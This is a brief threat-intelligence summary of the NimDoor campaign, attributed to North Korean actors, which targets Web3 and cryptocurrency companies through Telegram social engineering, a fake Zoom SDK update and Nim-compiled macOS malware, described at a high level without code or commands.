North Korean threat actors have launched a sophisticated attack campaign utilizing Nim-compiled malware, dubbed NimDoor, primarily targeting the Web3 and cryptocurrency sectors. The attacks have been characterized by deceptive social engineering tactics. Notably, an incident involved an attacker impersonating a trusted contact to gain initial access to a startup. Various malicious components were installed, including a Mach-O binary, which executed encrypted payloads using advanced techniques like code injection. The campaign focuses on ensuring persistence and data exfiltration through complex malware architecture involving several intricately designed binaries.
The NimDoor campaign employs advanced Nim-compiled malware targeting Web3 and cryptocurrency sectors, showcasing technical complexity and unconventional programming techniques.
A targeted attack on a Web3 startup involved a social engineering approach via Telegram, leading to the installation of multifaceted malicious components through a disguised Zoom SDK update.
The malware utilized a Mach-O file embedded with 10,000 empty lines for obfuscation, which downloaded and executed a payload communicating through an encrypted WebSocket.
CoreKitAgent, the malware's most complex component, operates as an event-driven application, contributing to the campaign's persistence and functionality within compromised systems.
Collection
[
|
...
]